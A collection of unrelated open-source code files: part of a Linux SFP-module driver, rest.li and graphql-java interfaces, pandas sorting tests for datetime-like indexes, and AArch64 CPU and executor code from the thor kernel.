	u8	br_max;
	u8	br_min;
	u8	vendor_sn[16];
	u8	date_code[8];
	u8	diags_type;
	u8	enhanced_options;
	u8	sff8472_compliance;
	u8	cc_ext;		/* checksum over bytes 64-94 */

	/* Vendor specific ID fields */
	u8	vendor_data[32];
	u8	sff8079[128];
};

/* SFF-8472 module identifier values (byte 0) */
enum identifier {
	UNKNOWN,
	GBIC,
	SFF,
	SFP,
	XBI,
	XENPACK,
	XFP,
	XFF,
	XFP_E,
	XPAK,
	X2,
	DWDM_SFP,
	QSFP,
MAX_ID, }; const char* id_names[] = { "UNKONWN", "GBIC", "SFF", "SFP", NULL, }; /* Flags for SFP modules compatible with ETH up to 1Gb */ struct sfp_flags { u8 e1000_base_sx:1; u8 e1000_base_lx:1; u8 e1000_base_cx:1; u8 e1000_base_t:1; u8 e100_base_lx:1; u8 e100_base_fx:1; u8 e10_base_bx10:1; u8 e10_base_px:1; }; #define STRING_APPEND(str, src) \ strncat(str, src, sizeof(src)); \ for (i = 1; i < sizeof(str); i++) \ if (str[i-1] == ' ' && str[i] == ' ') \ str[i] = 0; static int gw16083_read_port_sfp(struct i2c_client *client, struct mv88e1111_port_state *state) { int ret = 0; u8 data[256]; struct sfp_flags *eth_flags; u8 crc; int i; u8 *str; struct sfp_msa *sfp_msa = (struct sfp_msa *)data; int port = state->port; union i2c_smbus_data d; dev_dbg(&client->dev, "%s Port%d\n", __func__, port); if (!i2c_check_functionality(client->adapter, I2C_FUNC_SMBUS_READ_I2C_BLOCK)) return -ENODEV; d.byte = (port == 5) ? 1 : 2; if (i2c_smbus_xfer(client->adapter, GW16083_I2C_ADDR_PCA9543, client->flags, I2C_SMBUS_WRITE, 0, I2C_SMBUS_BYTE_DATA, &d) < 0) { dev_err(&client->dev, "Port%d: failed writing PCA9543 register\n", port); return ret; } /* read all 256 bytes of SFP EEPROM */ for (i = 0; i < sizeof(data); i += I2C_SMBUS_BLOCK_MAX) { d.block[0] = I2C_SMBUS_BLOCK_MAX; if (i2c_smbus_xfer(client->adapter, GW16083_I2C_ADDR_SFP1, client->flags, I2C_SMBUS_READ, i, I2C_SMBUS_I2C_BLOCK_DATA, &d) < 0) { dev_err(&client->dev, "Port%d: failed reading SFP data\n", port); return ret; } memcpy(data + i, d.block + 1, I2C_SMBUS_BLOCK_MAX); } /* Validate checksums */ for (crc = 0, i = 0; i < 63; i++) crc += data[i]; if (crc != sfp_msa->cc_base) { dev_err(&client->dev, "Port%d: " "Checksum failure for Base ID fields: 0x%02x\n", port, crc); #ifdef FAIL_ON_CHECKSUM_ERR return -EINVAL; #endif } for (crc = 0, i = 64; i < 95; i++) crc += data[i]; if (crc != sfp_msa->cc_ext) { dev_err(&client->dev, "Port%d: " "Checksum failure for Extended ID fields: 0x%02x\n", port, crc); #ifdef FAIL_ON_CHECKSUM_ERR 
return -EINVAL; #endif } state->sfp_id[0] = 0; for (i = 0; id_names[i]; i++) { if (sfp_msa->identifier == i) { sprintf(state->sfp_id, "%s: ", id_names[i]); break; } } STRING_APPEND(state->sfp_id, sfp_msa->vendor_oui); STRING_APPEND(state->sfp_id, sfp_msa->vendor_name); STRING_APPEND(state->sfp_id, sfp_msa->vendor_pn); STRING_APPEND(state->sfp_id, sfp_msa->vendor_rev); STRING_APPEND(state->sfp_id, sfp_msa->vendor_sn); dev_info(&client->dev, "Port%d: %s\n", port, state->sfp_id); if ((sfp_msa->identifier != GBIC) && (sfp_msa->identifier != SFF) && (sfp_msa->identifier != SFP)) { dev_err(&client->dev, "Port%d: Unknown module identifier: %d\n", port, sfp_msa->identifier); return -EINVAL; } str = ""; eth_flags = (struct sfp_flags *)(sfp_msa->transceiver + 3); if (eth_flags->e1000_base_sx) { str = "1000Base-SX (Fiber)"; } else if (eth_flags->e1000_base_lx) { str = "1000Base-LX (Fiber)"; } else if (eth_flags->e1000_base_t) { str = "1000Base-T (Copper)"; } else if (eth_flags->e100_base_fx) { str = "100Base-FX (Fiber) - not supported"; ret = -EINVAL; } else { str = "Unknown/Unsupported media type"; ret = -EINVAL; } if (ret) dev_err(&client->dev, "Port%d: %s (0x%02x)\n", port, str, sfp_msa->transceiver[3]); else dev_info(&client->dev, "Port%d: %s (0x%02x)\n", port, str, sfp_msa->transceiver[3]); return ret; } static int gw16083_probe(struct i2c_client *client, const struct i2c_device_id *id) { int ret; dev_info(&client->dev, "GW16083 Ethernet Expansion Mezzanine\n"); if (gw16083_client) { dev_err(&client->dev, "client already registered\n"); return -EINVAL; } gw16083_client = client; ret = phy_driver_register(&mv88e6176_phy_driver); if (ret) dev_err(&client->dev, "failed to register mv88e6176 phy driver: %d\n", ret); return ret; } static int gw16083_remove(struct i2c_client *client) { dev_dbg(&client->dev, "%s\n", __func__); phy_driver_unregister(&mv88e6176_phy_driver); gw16083_client = NULL; return 0; } static const struct of_device_id gw16083_dt_ids[] = { { .compatible = 
"gateworks,gw16083", }, { } }; MODULE_DEVICE_TABLE(of, gw16083_dt_ids); static const struct i2c_device_id gw16083_id[] = { { "gw16083", 0 }, { } }; MODULE_DEVICE_TABLE(i2c, gw16083_id); static struct i2c_driver gw16083_driver = { .driver = { .name = "gw16083", .of_match_table = gw16083_dt_ids, }, .probe = gw16083_probe, .remove = gw16083_remove, .id_table = gw16083_id, }; static int __init mv88e6176_init(void) { return i2c_add_driver(&gw16083_driver); } static void __exit mv88e6176_exit(void) { i2c_del_driver(&gw16083_driver); } module_init(mv88e6176_init); module_exit(mv88e6176_exit);
12,810
1,682
<reponame>haroldl/rest.li<gh_stars>1000+
/*
   Copyright (c) 2012 LinkedIn Corp.

   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at

       http://www.apache.org/licenses/LICENSE-2.0

   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
*/

package com.linkedin.restli.docgen;

import com.linkedin.data.template.RecordTemplate;
import com.linkedin.restli.restspec.ActionSchema;
import com.linkedin.restli.restspec.ActionsSetSchema;
import com.linkedin.restli.restspec.AssociationSchema;
import com.linkedin.restli.restspec.BatchFinderSchema;
import com.linkedin.restli.restspec.CollectionSchema;
import com.linkedin.restli.restspec.EntitySchema;
import com.linkedin.restli.restspec.FinderSchema;
import com.linkedin.restli.restspec.ParameterSchema;
import com.linkedin.restli.restspec.ResourceSchema;
import com.linkedin.restli.restspec.RestMethodSchema;
import com.linkedin.restli.restspec.SimpleSchema;
import com.linkedin.restli.server.ResourceLevel;

import java.util.List;

/**
 * Visits various features of a REST resource hierarchy. The hierarchy is formed
 * from disparate resource types, each of which has common method types, such as
 * rest methods, finders and actions.
 *
 * <p>(Note: the interface name misspells "Visitor"; it is public API and
 * cannot be renamed without breaking implementors.)
 *
 * @author dellamag
 */
public interface ResourceSchemaVisitior
{
  /**
   * Callback function when the visitor visits a {@link ResourceSchema}.
   *
   * @param visitContext hierarchy of all parent resource schemas (root is the first element)
   * @param resourceSchema resource being visited
   */
  void visitResourceSchema(VisitContext visitContext, ResourceSchema resourceSchema);

  /**
   * Callback function when the visitor visits a {@link CollectionSchema}.
   *
   * @param visitContext hierarchy of all parent resource schemas (root is the first element)
   * @param collectionSchema collection being visited
   */
  void visitCollectionResource(VisitContext visitContext, CollectionSchema collectionSchema);

  /**
   * Callback function when the visitor visits a {@link AssociationSchema}.
   *
   * @param visitContext hierarchy of all parent resource schemas (root is the first element)
   * @param associationSchema association being visited
   */
  void visitAssociationResource(VisitContext visitContext, AssociationSchema associationSchema);

  /**
   * Callback function when the visitor visits a {@link SimpleSchema}.
   *
   * @param visitContext hierarchy of all parent resource schemas (root is the first element)
   * @param simpleSchema simple being visited
   */
  void visitSimpleResource(VisitContext visitContext, SimpleSchema simpleSchema);

  /**
   * Callback function when the visitor visits a {@link ActionsSetSchema}.
   *
   * @param visitContext hierarchy of all parent resource schemas (root is the first element)
   * @param actionSetSchema action set being visited
   */
  void visitActionSetResource(VisitContext visitContext, ActionsSetSchema actionSetSchema);

  /**
   * Callback function when the visitor visits a {@link EntitySchema}.
   *
   * @param visitContext hierarchy of all parent resource schemas (root is the first element)
   * @param entitySchema entity being visited
   */
  void visitEntityResource(VisitContext visitContext, EntitySchema entitySchema);

  /**
   * Callback function when the visitor visits a {@link RestMethodSchema}.
   *
   * @param visitContext hierarchy of all parent resource schemas (root is the first element)
   * @param parentResource can be any of {@link CollectionSchema}, {@link ActionsSetSchema} or {@link EntitySchema}
   * @param restMethodSchema REST method being visited, e.g. GET, POST, BATCH_GET, etc
   */
  void visitRestMethod(VisitContext visitContext,
                       RecordTemplate parentResource,
                       RestMethodSchema restMethodSchema);

  /**
   * Callback function when the visitor visits a {@link FinderSchema}.
   *
   * @param visitContext hierarchy of all parent resource schemas (root is the first element)
   * @param parentResource can be any of {@link CollectionSchema}, {@link ActionsSetSchema} or {@link EntitySchema}
   * @param finderSchema finder being visited
   */
  void visitFinder(VisitContext visitContext,
                   RecordTemplate parentResource,
                   FinderSchema finderSchema);

  /**
   * Callback function when the visitor visits a {@link BatchFinderSchema}.
   *
   * @param visitContext hierarchy of all parent resource schemas (root is the first element)
   * @param parentResource can be any of {@link CollectionSchema}, {@link ActionsSetSchema} or {@link EntitySchema}
   * @param batchFinderSchema batchfinder being visited
   */
  void visitBatchFinder(VisitContext visitContext,
                        RecordTemplate parentResource,
                        BatchFinderSchema batchFinderSchema);

  /**
   * Callback function when the visitor visits a {@link ActionSchema}.
   *
   * @param visitContext hierarchy of all parent resource schemas (root is the first element)
   * @param parentResource can be any of {@link CollectionSchema}, {@link ActionsSetSchema} or {@link EntitySchema}
   * @param resourceLevel {@link ResourceLevel} of the action
   * @param actionSchema action being visited
   */
  void visitAction(VisitContext visitContext,
                   RecordTemplate parentResource,
                   ResourceLevel resourceLevel,
                   ActionSchema actionSchema);

  /**
   * Callback function when the visitor visits a {@link ParameterSchema}.
   *
   * @param visitContext hierarchy of all parent resource schemas (root is the first element)
   * @param parentResource can be any of {@link CollectionSchema}, {@link ActionsSetSchema} or {@link EntitySchema}
   * @param parentMethodSchema can be any of {@link RestMethodSchema}, {@link ActionSchema} or {@link FinderSchema}
   * @param parameterSchema parameter to be visited
   */
  void visitParameter(VisitContext visitContext,
                      RecordTemplate parentResource,
                      Object parentMethodSchema,
                      ParameterSchema parameterSchema);

  /**
   * Context data passed between visit callbacks.
   */
  static class VisitContext
  {
    /**
     * @param resourceSchemaHierarchy list of {@link ResourceSchema} that the visitor has traversed
     * @param resourcePath path of the resource
     */
    public VisitContext(List<ResourceSchema> resourceSchemaHierarchy, String resourcePath)
    {
      _resourceSchemaHierarchy = resourceSchemaHierarchy;
      _resourcePath = resourcePath;
    }

    /**
     * @return list of {@link ResourceSchema} that the visitor has traversed
     */
    public List<ResourceSchema> getResourceSchemaHierarchy()
    {
      return _resourceSchemaHierarchy;
    }

    /**
     * @return path of the resource
     */
    public String getResourcePath()
    {
      return _resourcePath;
    }

    /**
     * @return the most recently visited {@link ResourceSchema}
     */
    public ResourceSchema getParentSchema()
    {
      return _resourceSchemaHierarchy.get(_resourceSchemaHierarchy.size() - 1);
    }

    // traversal stack: root resource first, current resource last
    private final List<ResourceSchema> _resourceSchemaHierarchy;
    private final String _resourcePath;
  }
}
2,545
5,355
package graphql.language;

import graphql.PublicApi;

/**
 * Represents a node that can contain a description.
 *
 * @param <T> the concrete {@link Node} type implementing this interface
 */
@PublicApi
public interface DescribedNode<T extends Node> extends Node<T> {

    /**
     * @return the description of this node
     */
    Description getDescription();
}
91
28,899
"""
Tests for sort_values / argmin / argmax on datetime-like indexes
(DatetimeIndex, TimedeltaIndex, PeriodIndex), plus an integer Index for
compatibility checks.

The "with_freq" helpers cover indexes that are generate-able by
period_range/date_range/timedelta_range (already monotonic); the
"without_freq" helpers cover non-monotonic indexes, where sorting is
expected to drop the freq on DatetimeIndex/TimedeltaIndex but keep it on
PeriodIndex.
"""
import numpy as np
import pytest

from pandas import (
    DatetimeIndex,
    Index,
    NaT,
    PeriodIndex,
    TimedeltaIndex,
    timedelta_range,
)
import pandas._testing as tm


def check_freq_ascending(ordered, orig, ascending):
    """
    Check the expected freq on a PeriodIndex/DatetimeIndex/TimedeltaIndex
    when the original index is generated (or generate-able) with
    period_range/date_range/timedelta_range.
    """
    if isinstance(ordered, PeriodIndex):
        # PeriodIndex keeps its freq regardless of sort direction
        assert ordered.freq == orig.freq
    elif isinstance(ordered, (DatetimeIndex, TimedeltaIndex)):
        # Descending sort negates the freq multiple (e.g. "D" -> "-1D")
        if ascending:
            assert ordered.freq.n == orig.freq.n
        else:
            assert ordered.freq.n == -1 * orig.freq.n


def check_freq_nonmonotonic(ordered, orig):
    """
    Check the expected freq on a PeriodIndex/DatetimeIndex/TimedeltaIndex
    when the original index is _not_ generated (or generate-able) with
    period_range/date_range//timedelta_range.
    """
    if isinstance(ordered, PeriodIndex):
        # PeriodIndex freq is an attribute of the dtype, so it survives sorting
        assert ordered.freq == orig.freq
    elif isinstance(ordered, (DatetimeIndex, TimedeltaIndex)):
        # A non-range-like index has no inferable freq after sorting
        assert ordered.freq is None


class TestSortValues:
    @pytest.fixture(params=[DatetimeIndex, TimedeltaIndex, PeriodIndex])
    def non_monotonic_idx(self, request):
        # Three-element, non-monotonic index for each datetime-like flavor;
        # in every case the min is at position 1 and the max at position 0.
        if request.param is DatetimeIndex:
            return DatetimeIndex(["2000-01-04", "2000-01-01", "2000-01-02"])
        elif request.param is PeriodIndex:
            dti = DatetimeIndex(["2000-01-04", "2000-01-01", "2000-01-02"])
            return dti.to_period("D")
        else:
            return TimedeltaIndex(
                ["1 day 00:00:05", "1 day 00:00:01", "1 day 00:00:02"]
            )

    def test_argmin_argmax(self, non_monotonic_idx):
        assert non_monotonic_idx.argmin() == 1
        assert non_monotonic_idx.argmax() == 0

    def test_sort_values(self, non_monotonic_idx):
        idx = non_monotonic_idx
        ordered = idx.sort_values()
        assert ordered.is_monotonic

        ordered = idx.sort_values(ascending=False)
        assert ordered[::-1].is_monotonic

        # return_indexer=True also yields the argsort positions
        ordered, dexer = idx.sort_values(return_indexer=True)
        assert ordered.is_monotonic
        tm.assert_numpy_array_equal(dexer, np.array([1, 2, 0], dtype=np.intp))

        ordered, dexer = idx.sort_values(return_indexer=True, ascending=False)
        assert ordered[::-1].is_monotonic
        tm.assert_numpy_array_equal(dexer, np.array([0, 2, 1], dtype=np.intp))

    def check_sort_values_with_freq(self, idx):
        # idx is assumed monotonic ascending (range-generated), so an
        # ascending sort is the identity and the indexer is [0, 1, 2].
        ordered = idx.sort_values()
        tm.assert_index_equal(ordered, idx)
        check_freq_ascending(ordered, idx, True)

        ordered = idx.sort_values(ascending=False)
        expected = idx[::-1]
        tm.assert_index_equal(ordered, expected)
        check_freq_ascending(ordered, idx, False)

        ordered, indexer = idx.sort_values(return_indexer=True)
        tm.assert_index_equal(ordered, idx)
        tm.assert_numpy_array_equal(indexer, np.array([0, 1, 2], dtype=np.intp))
        check_freq_ascending(ordered, idx, True)

        ordered, indexer = idx.sort_values(return_indexer=True, ascending=False)
        expected = idx[::-1]
        tm.assert_index_equal(ordered, expected)
        tm.assert_numpy_array_equal(indexer, np.array([2, 1, 0], dtype=np.intp))
        check_freq_ascending(ordered, idx, False)

    @pytest.mark.parametrize("freq", ["D", "H"])
    def test_sort_values_with_freq_timedeltaindex(self, freq):
        # GH#10295
        idx = timedelta_range(start=f"1{freq}", periods=3, freq=freq).rename("idx")
        self.check_sort_values_with_freq(idx)

    @pytest.mark.parametrize(
        "idx",
        [
            DatetimeIndex(
                ["2011-01-01", "2011-01-02", "2011-01-03"], freq="D", name="idx"
            ),
            DatetimeIndex(
                ["2011-01-01 09:00", "2011-01-01 10:00", "2011-01-01 11:00"],
                freq="H",
                name="tzidx",
                tz="Asia/Tokyo",
            ),
        ],
    )
    def test_sort_values_with_freq_datetimeindex(self, idx):
        self.check_sort_values_with_freq(idx)

    @pytest.mark.parametrize("freq", ["D", "2D", "4D"])
    def test_sort_values_with_freq_periodindex(self, freq):
        # here with_freq refers to being period_range-like
        idx = PeriodIndex(
            ["2011-01-01", "2011-01-02", "2011-01-03"], freq=freq, name="idx"
        )
        self.check_sort_values_with_freq(idx)

    @pytest.mark.parametrize(
        "idx",
        [
            PeriodIndex(["2011", "2012", "2013"], name="pidx", freq="A"),
            Index([2011, 2012, 2013], name="idx"),  # for compatibility check
        ],
    )
    def test_sort_values_with_freq_periodindex2(self, idx):
        # here with_freq indicates this is period_range-like
        self.check_sort_values_with_freq(idx)

    def check_sort_values_without_freq(self, idx, expected):
        # idx is assumed to be length 5 and non-monotonic; the hard-coded
        # indexers below ([0, 4, 3, 1, 2] / [2, 1, 3, 0, 4]) encode the
        # stable-sort positions for the fixtures used by the callers.
        ordered = idx.sort_values(na_position="first")
        tm.assert_index_equal(ordered, expected)
        check_freq_nonmonotonic(ordered, idx)

        if not idx.isna().any():
            # default na_position only differs when NaT is present
            ordered = idx.sort_values()
            tm.assert_index_equal(ordered, expected)
            check_freq_nonmonotonic(ordered, idx)

        ordered = idx.sort_values(ascending=False)
        tm.assert_index_equal(ordered, expected[::-1])
        check_freq_nonmonotonic(ordered, idx)

        ordered, indexer = idx.sort_values(return_indexer=True, na_position="first")
        tm.assert_index_equal(ordered, expected)

        exp = np.array([0, 4, 3, 1, 2], dtype=np.intp)
        tm.assert_numpy_array_equal(indexer, exp)
        check_freq_nonmonotonic(ordered, idx)

        if not idx.isna().any():
            ordered, indexer = idx.sort_values(return_indexer=True)
            tm.assert_index_equal(ordered, expected)

            exp = np.array([0, 4, 3, 1, 2], dtype=np.intp)
            tm.assert_numpy_array_equal(indexer, exp)
            check_freq_nonmonotonic(ordered, idx)

        ordered, indexer = idx.sort_values(return_indexer=True, ascending=False)
        tm.assert_index_equal(ordered, expected[::-1])

        exp = np.array([2, 1, 3, 0, 4], dtype=np.intp)
        tm.assert_numpy_array_equal(indexer, exp)
        check_freq_nonmonotonic(ordered, idx)

    def test_sort_values_without_freq_timedeltaindex(self):
        # GH#10295
        idx = TimedeltaIndex(
            ["1 hour", "3 hour", "5 hour", "2 hour ", "1 hour"], name="idx1"
        )
        expected = TimedeltaIndex(
            ["1 hour", "1 hour", "2 hour", "3 hour", "5 hour"], name="idx1"
        )
        self.check_sort_values_without_freq(idx, expected)

    @pytest.mark.parametrize(
        "index_dates,expected_dates",
        [
            (
                ["2011-01-01", "2011-01-03", "2011-01-05", "2011-01-02", "2011-01-01"],
                ["2011-01-01", "2011-01-01", "2011-01-02", "2011-01-03", "2011-01-05"],
            ),
            (
                ["2011-01-01", "2011-01-03", "2011-01-05", "2011-01-02", "2011-01-01"],
                ["2011-01-01", "2011-01-01", "2011-01-02", "2011-01-03", "2011-01-05"],
            ),
            (
                [NaT, "2011-01-03", "2011-01-05", "2011-01-02", NaT],
                [NaT, NaT, "2011-01-02", "2011-01-03", "2011-01-05"],
            ),
        ],
    )
    def test_sort_values_without_freq_datetimeindex(
        self, index_dates, expected_dates, tz_naive_fixture
    ):
        tz = tz_naive_fixture

        # without freq
        idx = DatetimeIndex(index_dates, tz=tz, name="idx")
        expected = DatetimeIndex(expected_dates, tz=tz, name="idx")

        self.check_sort_values_without_freq(idx, expected)

    @pytest.mark.parametrize(
        "idx,expected",
        [
            (
                PeriodIndex(
                    [
                        "2011-01-01",
                        "2011-01-03",
                        "2011-01-05",
                        "2011-01-02",
                        "2011-01-01",
                    ],
                    freq="D",
                    name="idx1",
                ),
                PeriodIndex(
                    [
                        "2011-01-01",
                        "2011-01-01",
                        "2011-01-02",
                        "2011-01-03",
                        "2011-01-05",
                    ],
                    freq="D",
                    name="idx1",
                ),
            ),
            (
                PeriodIndex(
                    [
                        "2011-01-01",
                        "2011-01-03",
                        "2011-01-05",
                        "2011-01-02",
                        "2011-01-01",
                    ],
                    freq="D",
                    name="idx2",
                ),
                PeriodIndex(
                    [
                        "2011-01-01",
                        "2011-01-01",
                        "2011-01-02",
                        "2011-01-03",
                        "2011-01-05",
                    ],
                    freq="D",
                    name="idx2",
                ),
            ),
            (
                PeriodIndex(
                    [NaT, "2011-01-03", "2011-01-05", "2011-01-02", NaT],
                    freq="D",
                    name="idx3",
                ),
                PeriodIndex(
                    [NaT, NaT, "2011-01-02", "2011-01-03", "2011-01-05"],
                    freq="D",
                    name="idx3",
                ),
            ),
            (
                PeriodIndex(
                    ["2011", "2013", "2015", "2012", "2011"], name="pidx", freq="A"
                ),
                PeriodIndex(
                    ["2011", "2011", "2012", "2013", "2015"], name="pidx", freq="A"
                ),
            ),
            (
                # For compatibility check
                Index([2011, 2013, 2015, 2012, 2011], name="idx"),
                Index([2011, 2011, 2012, 2013, 2015], name="idx"),
            ),
        ],
    )
    def test_sort_values_without_freq_periodindex(self, idx, expected):
        # here without_freq means not generateable by period_range
        self.check_sort_values_without_freq(idx, expected)

    def test_sort_values_without_freq_periodindex_nat(self):
        # doesn't quite fit into check_sort_values_without_freq
        # (length 4, so the hard-coded length-5 indexers don't apply)
        idx = PeriodIndex(["2011", "2013", "NaT", "2011"], name="pidx", freq="D")
        expected = PeriodIndex(["NaT", "2011", "2011", "2013"], name="pidx", freq="D")

        ordered = idx.sort_values(na_position="first")
        tm.assert_index_equal(ordered, expected)
        check_freq_nonmonotonic(ordered, idx)

        ordered = idx.sort_values(ascending=False)
        tm.assert_index_equal(ordered, expected[::-1])
        check_freq_nonmonotonic(ordered, idx)


def test_order_stability_compat():
    # GH#35922. sort_values is stable both for normal and datetime-like Index
    pidx = PeriodIndex(["2011", "2013", "2015", "2012", "2011"], name="pidx", freq="A")
    iidx = Index([2011, 2013, 2015, 2012, 2011], name="idx")
    ordered1, indexer1 = pidx.sort_values(return_indexer=True, ascending=False)
    ordered2, indexer2 = iidx.sort_values(return_indexer=True, ascending=False)
    tm.assert_numpy_array_equal(indexer1, indexer2)
6,102
935
<gh_stars>100-1000
// AArch64 CPU/executor support for the thor kernel: executor save/restore,
// user/fiber contexts, and per-CPU bring-up.
#include <thor-internal/arch/cpu.hpp>
#include <generic/thor-internal/cpu-data.hpp>
#include <frg/manual_box.hpp>
#include <thor-internal/main.hpp>
#include <thor-internal/kasan.hpp>
#include <thor-internal/fiber.hpp>

namespace thor {

// Assembly helpers that spill/reload the FP/SIMD register file.
extern "C" void saveFpSimdRegisters(FpRegisters *frame);
extern "C" void restoreFpSimdRegisters(FpRegisters *frame);

bool FaultImageAccessor::allowUserPages() {
	return true;
}

void UserContext::deactivate() { }

UserContext::UserContext()
: kernelStack(UniqueKernelStack::make()) { }

// Point the target CPU's exception stack at this context's kernel stack.
// Must run with interrupts disabled.
void UserContext::migrate(CpuData *cpu_data) {
	assert(!intsAreEnabled());
	cpu_data->exceptionStackPtr = kernelStack.basePtr();
}

FiberContext::FiberContext(UniqueKernelStack stack)
: stack{std::move(stack)} { }

extern "C" [[ noreturn ]] void _restoreExecutorRegisters(void *pointer);

// Switch to the given executor: publish its domain and exception stack to
// the per-CPU data, reload FP/SIMD state, then jump into the register
// restore stub. Does not return.
[[noreturn]] void restoreExecutor(Executor *executor) {
	getCpuData()->currentDomain = static_cast<uint64_t>(executor->general()->domain);
	getCpuData()->exceptionStackPtr = executor->_exceptionStack;
	restoreFpSimdRegisters(&executor->general()->fp);
	_restoreExecutorRegisters(executor->general());
}

size_t Executor::determineSize() {
	return sizeof(Frame);
}

Executor::Executor()
: _pointer{nullptr}, _exceptionStack{nullptr} { }

// Build an executor that enters user space at abi.ip with stack abi.sp.
// spsr = 0 selects EL0 with interrupts unmasked on eret.
Executor::Executor(UserContext *context, AbiParameters abi) {
	_pointer = static_cast<char *>(kernelAlloc->allocate(getStateSize()));
	memset(_pointer, 0, getStateSize());

	general()->elr = abi.ip;
	general()->sp = abi.sp;
	general()->spsr = 0;
	general()->domain = Domain::user;

	_exceptionStack = context->kernelStack.basePtr();
}

// Build an executor for a kernel fiber. The fiber entry point receives
// abi.argument in x0; spsr = 5 selects EL1h (kernel mode, SP_EL1).
Executor::Executor(FiberContext *context, AbiParameters abi)
: _exceptionStack{nullptr} {
	_pointer = static_cast<char *>(kernelAlloc->allocate(getStateSize()));
	memset(_pointer, 0, getStateSize());

	general()->elr = abi.ip;
	general()->sp = (uintptr_t)context->stack.basePtr();
	general()->x[0] = abi.argument;
	general()->spsr = 5;
	general()->domain = Domain::fiber;
}

Executor::~Executor() {
	kernelAlloc->free(_pointer);
}
void saveExecutor(Executor *executor, FaultImageAccessor accessor) { for (int i = 0; i < 31; i++) executor->general()->x[i] = accessor._frame()->x[i]; executor->general()->elr = accessor._frame()->elr; executor->general()->spsr = accessor._frame()->spsr; executor->general()->domain = accessor._frame()->domain; executor->general()->sp = accessor._frame()->sp; executor->general()->tpidr_el0 = accessor._frame()->tpidr_el0; saveFpSimdRegisters(&executor->general()->fp); } void saveExecutor(Executor *executor, IrqImageAccessor accessor) { for (int i = 0; i < 31; i++) executor->general()->x[i] = accessor._frame()->x[i]; executor->general()->elr = accessor._frame()->elr; executor->general()->spsr = accessor._frame()->spsr; executor->general()->domain = accessor._frame()->domain; executor->general()->sp = accessor._frame()->sp; executor->general()->tpidr_el0 = accessor._frame()->tpidr_el0; saveFpSimdRegisters(&executor->general()->fp); } void saveExecutor(Executor *executor, SyscallImageAccessor accessor) { for (int i = 0; i < 31; i++) executor->general()->x[i] = accessor._frame()->x[i]; executor->general()->elr = accessor._frame()->elr; executor->general()->spsr = accessor._frame()->spsr; executor->general()->domain = accessor._frame()->domain; executor->general()->sp = accessor._frame()->sp; executor->general()->tpidr_el0 = accessor._frame()->tpidr_el0; saveFpSimdRegisters(&executor->general()->fp); } extern "C" void workStub(); void workOnExecutor(Executor *executor) { auto sp = reinterpret_cast<uint64_t *>(executor->getExceptionStack()); auto push = [&] (uint64_t v) { sp -= 2; memcpy(sp, &v, 8); }; assert(executor->general()->domain == Domain::user); assert(getCpuData()->currentDomain != static_cast<uint64_t>(Domain::user)); push(static_cast<uint64_t>(executor->general()->domain)); push(executor->general()->sp); push(executor->general()->elr); push(executor->general()->spsr); void *stub = reinterpret_cast<void *>(&workStub); executor->general()->domain = Domain::fault; 
executor->general()->elr = reinterpret_cast<uintptr_t>(stub); executor->general()->sp = reinterpret_cast<uintptr_t>(sp); executor->general()->spsr = 0x3c5; } void scrubStack(FaultImageAccessor accessor, Continuation cont) { scrubStackFrom(reinterpret_cast<uintptr_t>(accessor.frameBase()), cont);; } void scrubStack(IrqImageAccessor accessor, Continuation cont) { scrubStackFrom(reinterpret_cast<uintptr_t>(accessor.frameBase()), cont);; } void scrubStack(SyscallImageAccessor accessor, Continuation cont) { scrubStackFrom(reinterpret_cast<uintptr_t>(accessor.frameBase()), cont);; } void scrubStack(Executor *executor, Continuation cont) { scrubStackFrom(reinterpret_cast<uintptr_t>(*executor->sp()), cont); } size_t getStateSize() { return Executor::determineSize(); } void switchExecutor(smarter::borrowed_ptr<Thread> thread) { assert(!intsAreEnabled()); getCpuData()->activeExecutor = thread; } smarter::borrowed_ptr<Thread> activeExecutor() { return getCpuData()->activeExecutor; } PlatformCpuData::PlatformCpuData() { for(int i = 0; i < maxAsid; i++) asidBindings[i].setupAsid(i); } // TODO: support PAN? 
// User-memory access window control. Empty for now; PAN support would make
// these toggle PSTATE.PAN (see the TODO above).
void enableUserAccess() { }
void disableUserAccess() { }

// If a fault at `address` happened inside the registered user-access region
// (uar), redirect the faulting IP to the region's fixup address and report
// the fault as handled. Returns false for kernel-half addresses, when no
// region is registered, or when the access kind is not permitted.
bool handleUserAccessFault(uintptr_t address, bool write, FaultImageAccessor accessor) {
	if(inHigherHalf(address))
		return false;

	auto uar = getCpuData()->currentUar;
	if(!uar)
		return false;

	auto ip = *accessor.ip();
	if(!(ip >= reinterpret_cast<uintptr_t>(uar->startIp)
			&& ip < reinterpret_cast<uintptr_t>(uar->endIp)))
		return false;

	if(write) {
		if(!(uar->flags & uarWrite))
			return false;
	}else{
		if(!(uar->flags & uarRead))
			return false;
	}

	*accessor.ip() = reinterpret_cast<Word>(uar->faultIp);
	return true;
}

// Call function(argument, original_sp) on the stack `sp`, then restore the
// original stack. x28 (callee-saved) preserves the old sp across the call.
// Must run with interrupts disabled.
void doRunOnStack(void (*function) (void *, void *), void *sp, void *argument) {
	assert(!intsAreEnabled());

	cleanKasanShadow(reinterpret_cast<std::byte *>(sp) - UniqueKernelStack::kSize,
			UniqueKernelStack::kSize);
	asm volatile (
			"\tmov x28, sp\n"
			"\tmov x1, sp\n"
			"\tmov x0, %0\n"
			"\tmov sp, %2\n"
			"\tblr %1\n"
			"\tmov sp, x28\n"
			:
			: "r" (argument), "r" (function), "r" (sp)
			: "x30", "x28", "x1", "x0", "memory");
}

// No HW entropy source is wired up on this architecture yet.
Error getEntropyFromCpu(void *buffer, size_t size) {
	return Error::noHardwareSupport;
}

namespace {
	// Registry of all per-CPU data blocks; index = cpuIndex.
	frg::manual_box<frg::vector<CpuData *, KernelAlloc>> allCpuContexts;
}

int getCpuCount() {
	return allCpuContexts->size();
}

// Indexed accessor into the per-CPU registry (distinct from the no-argument
// getCpuData() used above, which returns the current CPU's data).
CpuData *getCpuData(size_t k) {
	return (*allCpuContexts)[k];
}

// Statically allocated context for the boot CPU, used before the kernel
// allocator is available.
frg::manual_box<CpuData> staticBootCpuContext;

// Publish the per-CPU context via its self-pointer and TPIDR_EL1 so
// getCpuData() can find it.
void setupCpuContext(AssemblyCpuData *context) {
	context->selfPointer = context;

	asm volatile("msr tpidr_el1, %0" :: "r"(context));
}

void setupBootCpuContext() {
	staticBootCpuContext.initialize();

	setupCpuContext(staticBootCpuContext.get());
}

